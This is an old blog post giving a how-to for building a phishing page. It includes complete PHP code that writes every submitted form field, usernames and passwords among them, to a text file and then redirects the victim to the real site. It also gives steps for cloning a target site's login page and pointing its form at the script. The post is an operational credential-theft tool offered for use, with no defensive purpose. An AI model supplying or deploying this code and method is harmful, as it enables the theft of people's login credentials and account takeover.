Saturday, January 10, 2009

*** How to make a phisher ***


Firstly, you need a host with php, like 100mb or freehostia or whatever.

Now, copypaste this and save it as phish.php.


CODE
header("Location: www.site.com");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit; ?>



Edit "www.site.com" to the site you're phishing, coz it redirects to that URL after the person submits the login.

Now, save the login page of whatever site you want to clone.

In the source (open with notepad), find where it says "form action=" and replace the URL with "phish.php", and where it says "method=post", change "post" to "get".

Now, save it, and upload all contents to the site you just made. Make sure all CSS/images/links and stuff work, because your mission is to get a replica page.

Now that should be about all, ask here for any questions.


-------------------------------------------------------------

0 comments:

Post a Comment

Followers

Archive

 

╚►ITECHNOGURU™◄╝. Copyright 2008 All Rights Reserved Revolution Two Church theme by Brian Gardner Converted into Blogger Template by Bloganol dot com